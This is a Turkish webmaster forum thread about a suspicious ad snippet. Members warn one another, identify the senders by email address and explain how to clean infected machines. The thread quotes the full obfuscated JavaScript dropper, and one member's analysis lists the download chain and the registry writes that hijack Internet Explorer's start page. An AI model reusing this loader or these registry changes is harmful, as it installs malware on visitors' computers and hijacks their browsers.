Bu site virüslümü ?

[iLgisiz]

merhaba arkadaşlar, bir site benim siteme reklam verdi ve arkadaşlarımdan bir kaçı pcimize virüs girdi dedi bende bu koddan şüphelendim,

http://www.ikizsohbet.com/reklam.swf.htm

aceba virüs varmı yok mu ?

[Loi]

Ben java scriptden anlamam, eger viruslu ise bu sayfa bu mesaj okundugunda sayfanin sahibi kodlari silecektir o nedenle anlayanlar bu kodlari tercume edebilirmi?

Alıntı:

<script language=javascript>
function dF(s){
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)
t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
dF('%264Dtdsjqu%2631mbohvbhf%264E%2633kbwbtdsjqu%2 633%264F%261Bepdvnfou/xsjuf%2639voftdbqf%2639%2638%26364D%263684%263674% 263683%26367%3A%263681%263685%263631%26367D%263672 %26367F%263678%263686%263672%263678%263676%26364E% 263633%263667%263653%263664%263674%263683%26367%3A %263681%263685%263633%26364F%26361B%26367G%26367F% 263631%263676%263683%263683%26367G%263683%263631%2 63683%263676%263684%263686%26367E%263676%263631%26 367F%263676%263689%263685%26361B%263675%26367D%263 631%26364E%263631%263633%263659%263685%263685%2636 81%26364B%26363G%26363G%263688%263688%263688%26363 F%26367C%26367D%263672%263687%26368%3A%263676%2636 7E%26367%3A%26368B%26363F%26367G%263683%263678%263 63G%263652%263675%263672%26367F%263672%26367D%2636 7%3A%26363F%263679%263685%263672%263633%26361B%263 664%263676%263685%263631%263675%263677%263631%2636 4E%263631%263675%26367G%263674%263686%26367E%26367 6%26367F%263685%26363F%263674%263683%263676%263672 %263685%263676%263656%26367D%263676%26367E%263676% 26367F%263685%263639%263633%26367G%263673%26367B%2 63676%263674%263685%263633%26363%3A%26361B%263675% 263677%26363F%263684%263676%263685%263652%263685%2 63685%263683%26367%3A%263673%263686%263685%263676% 263631%263633%263674%26367D%263672%263684%263684%2 6367%3A%263675%263633%26363D%263631%263633%263674% 26367D%263684%26367%3A%263675%26364B%263653%263655 %26364%3A%263647%263654%263646%263646%263647%26363 E%263647%263646%263652%263644%26363E%263642%263642 %263655%263641%26363E%26364%3A%263649%263644%26365 2%26363E%263641%263641%263654%263641%263645%263657 %263654%263643%26364%3A%263656%263644%263647%26363 3%26361B%263684%263685%263683%26364E%263633%26365E %26367%3A%263674%263683%26367G%263684%26367G%26367 7%263685%26363F%263669%26365E%26365D%263659%263665 %263665%263661%263633%26361B%263664%263676%263685% 263631%263689%263631%26364E%263631%263675%263677%2 6363F%263654%263683%263676%263672%263685%263676%26 365G%263673%26367B%263676%263674%263685%263639%263 684%263685%263683%26363D%263633%263633%26363%3A%26 361B%263672%263642%26364E%263633%263652%263675%263 67G%263633%26361B%263672%263643%26364E%263633%2636 75%263673%26363F%263633%26361B%263672%263644%26364 E%263633%263664%263685%263683%263633%26361B%263672 %263645%26364E%263633%263676%263672%26367E%263633% 26361B%263684%263685%263683%263642%26364E%263672%2 63642%263637%263672%263643%263637%263672%263644%26 3637%263672%263645%26361B%263684%263685%263683%263 646%26364E%263684%263685%263683%263642%26361B%2636 84%263676%263685%263631%263664%263631%26364E%26363 1%263675%263677%26363F%263674%263683%263676%263672 %263685%263676%26367G%263673%26367B%263676%263674% 263685%263639%263684%263685%263683%263646%26363D%2 63633%263633%26363%3A%26361B%263664%26363F%263685% 26368%3A%263681%263676%263631%26364E%263631%263642 %26361B%263684%263685%263683%263647%26364E%263633% 263658%263656%263665%263633%26361B%263689%26363F%2 6365G%263681%263676%26367F%263631%263684%263685%26 3683%263647%26363D%263631%263675%26367D%26363D%263 631%263657%263672%26367D%263684%263676%26361B%2636 89%26363F%263664%263676%26367F%263675%26361B%26367 7%26367F%263672%26367E%263676%263642%26364E%263633 %26367F%263676%263688%26363F%263679%263685%263672% 263633%26361B%263684%263676%263685%263631%263657%2 63631%26364E%263631%263675%263677%26363F%263674%26 3683%263676%263672%263685%263676%26367G%263673%263 67B%263676%263674%263685%263639%263633%263664%2636 74%263683%26367%3A%263681%263685%26367%3A%26367F%2 63678%26363F%263657%26367%3A%26367D%263676%263664% 26368%3A%263684%263685%263676%26367E%26365G%263673 %26367B%263676%263674%263685%263633%26363D%263633% 263633%26363%3A%26361B%263684%263676%263685%263631 %263685%26367E%263681%263631%26364E%263631%263657% 26363F%263658%263676%263685%263664%263681%263676%2 63674%26367%3A%263672%26367D%263657%26367G%26367D% 263675%263676%263683%263639%263643%26363%3A%26361B %263677%26367F%263672%26367E%263676%263642%26364E% 263631%263657%26363F%263653%263686%26367%3A%26367D %263675%263661%263672%263685%263679%263639%263685% 26367E%263681%26363D%263677%26367F%263672%26367E%2 63676%263642%26363%3A%26361B%263664%26363F%26367G% 263681%263676%26367F%26361B%263664%26363F%263688%2 63683%26367%3A%263685%263676%263631%263689%26363F% 263683%263676%263684%263681%26367G%26367F%263684%2 63676%263653%26367G%263675%26368%3A%26361B%263664% 26363F%263684%263672%263687%263676%263685%26367G%2 63677%26367%3A%26367D%263676%263631%263677%26367F% 263672%26367E%263676%263642%26363D%263643%26361B%2 63664%26363F%263674%26367D%26367G%263684%263676%26 361B%263684%263676%263685%263631%263662%263631%263 64E%263631%263675%263677%26363F%263674%263683%2636 76%263672%263685%263676%26367G%263673%26367B%26367 6%263674%263685%263639%263633%263664%263679%263676 %26367D%26367D%26363F%263652%263681%263681%26367D% 26367%3A%263674%263672%263685%26367%3A%26367G%2636 7F%263633%26363D%263633%263633%26363%3A%26361B%263 662%26363F%263664%263679%263676%26367D%26367D%2636 56%263689%263676%263674%263686%263685%263676%26363 1%263677%26367F%263672%26367E%263676%263642%26363D %263633%263633%26363D%263633%263633%26363D%263633% 26367G%263681%263676%26367F%263633%26363D%263641%2 6361B%26364D%26363G%263684%263674%263683%26367%3A% 263681%263685%26364F%2638%263%3A%263%3A%264C%261B% 264D0tdsjqu%264F1');
</script>

<SCRIPT language=JavaScript>curPage=1;
document.oncontextmenu = function(){return false}
if(document.layers) {
window.captureEvents(Event.MOUSEDOWN);
window.onmousedown = function(e){
if(e.target==document)return false;
}
}
else {
document.onmousedown = function(){return false}
}</SCRIPT>

[keyfinebak.com]

siteye girenlerin pc'ye 3 adet mirc programı tarzında bişiler yüklüyor ve explorer sayfasını kitliyor. aynı şeyi banada yapmaya çalıştı ama defettim başımdan. Gerçi sonradan al elinden parasını yayınlama reklamı gibi düşündüm ama ondan bir farkım olmazdı. parasıda lazım değil kendide zihinsel özürlü mahlukat.

msn adresleri :

reklam@canliyayinda.net
sevdagulu_375@hotmail.com

bu tarz beyinsiz mahlukatlardan uzak durmak gerekiyor.

[Loi]

Ben firefox kullanmaktayim ve bu tur seyler beni pek etkilemiyor. Tum webmasterlara siddetle oneriyorum FIREFOX kullanin. Ayrica keyfinebak.com unda belirttigi gibi icerisinde reklam kodlarinin bulunmadigi sizinde anlamadiginiz kodlarin bulundugu sayfalara iframe actirmayin. Bu tur reklamlar almayin..

[keyfinebak.com]

Alıntı:

Loi´isimli üyeden Alıntı

Ben firefox kullanmaktayim ve bu tur seyler beni pek etkilemiyor. Tum webmasterlara siddetle oneriyorum FIREFOX kullanin. Ayrica keyfinebak.com unda belirttigi gibi icerisinde reklam kodlarinin bulunmadigi sizinde anlamadiginiz kodlarin bulundugu sayfalara iframe actirmayin. Bu tur reklamlar almayin..

Loi firefox konusunda sana katılıyorum ama işte sitelerimize gelen ziyaretçilerin çoğu explorer kullanıyor. kendimiz gibi onlarıda düşünmeliyiz. böle kendi çıkarında hareket eden bir zavallı yüzünden sitemiz ziyaretçilerini zor durumda bırakmamalıyız. ve dediğin gibi verdiği kod iframe içindeydi huylandım olaydan siteyi inceleme fırsatımda olmadı denemeyi yaptığımda bilgisayara 3 tane program vari bişi yüklenmiş ve explorer ana sayfasına bi siteyi eklemişti. yazık dedim bastım msnden engeli elemana.

yukarıdaki mail adreslerini kullanıyor, dikkatli olmakta fayda var.

[iLgisiz]

Alıntı:

keyfinebak.com´isimli üyeden Alıntı

siteye girenlerin pc'ye 3 adet mirc programı tarzında bişiler yüklüyor ve explorer sayfasını kitliyor. aynı şeyi banada yapmaya çalıştı ama defettim başımdan. Gerçi sonradan al elinden parasını yayınlama reklamı gibi düşündüm ama ondan bir farkım olmazdı. parasıda lazım değil kendide zihinsel özürlü mahlukat.

msn adresleri :

reklam@canliyayinda.net
sevdagulu_375@hotmail.com

bu tarz beyinsiz mahlukatlardan uzak durmak gerekiyor.

evet onlar tam birer şerefsiz! zaten ilk nete girdiğimde tanıyorum irc serverlerda reklam atıyorlardı atabey tanır . forumda nicki var sanırım

[Loi]

Baglandigi IRC sunucularini buraya yazarsaniz IPleri kontrol eder datacenterlara hizmet vermelerini engelletebiliriz. Muhtemelen saldiri botuda yukleniyordur makinalara..

[maiL]

banada gelmişti bir keresinde iframe ile kendi kodlarını yayınlamamı istedi.
daha kodları almadan anladım yamuk olduğunu site adresini istedim. girdim mircler yüklenmişti. böyle kendini cin oldum şeytan çarpıcam ayağına yatanlara uyuz oluyorum.

[DincerAydogdu]

Kötü amaçlarla kullanılmaması için kodun deşifre edilmiş halini buraya koymuyorum ama yaptıklarını ve bulaşmışsa ne yapılması gerektiğini anlatmaya çalışayım.

Sistem sayfaya internet explorer tarafından desteklenen vbscript basıyor. Bu script ile activex kullanarak http://www.klavyemiz.org adresinden yeni bir vbscript indiriyor ve bunu internet explorer temporary files içine new.hta ismiyle kaydediyor ve bu kaydettiği dosyaya çalışma emri veriyor. Çalıştığı zaman c:\windows\news.vbs ve c:\windows\cansu2.exe şeklinde iki dosya atıyor ve bunların içeriğine http://www.asigenclik.net/kelebek.exe adresinden aldığı datayı koyuyor. Nihayetinde bunları çalıştırıyor.

En son olarak alttaki register ayarlarını değiştiriyor.

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\UR L\Prefixes\\mirc","http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Bar", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Local Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\Source", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\SubscribedURL", "http://www.esenruzgar.net","REG_SZ"

Tüm bu işlemler için http://www.klavyemiz.org, http://www.asigenclik.net ve http://www.esenruzgar.net adresleri kullanılıyor. Tabi ki indirdiği exe file’ları çalıştırmadım. O nedenle nereye ne yazdığını bilemiyorum. Ancak üstte geçen tüm dosyaları silerseniz muhtemelen bu dertten kurtulursunuz. Bu arada bu sadece kopya windowslarda ortaya çıkar. IE’nin bu açığı yeni yamalarla kapatıldı.

Bence bunlar ve benzerleri için şikayet edilebilecek bir merciye ulaşmak lazım. Böyle onursuzca ve alanen yapılan bir harekete tepkisiz kalmak olmaz.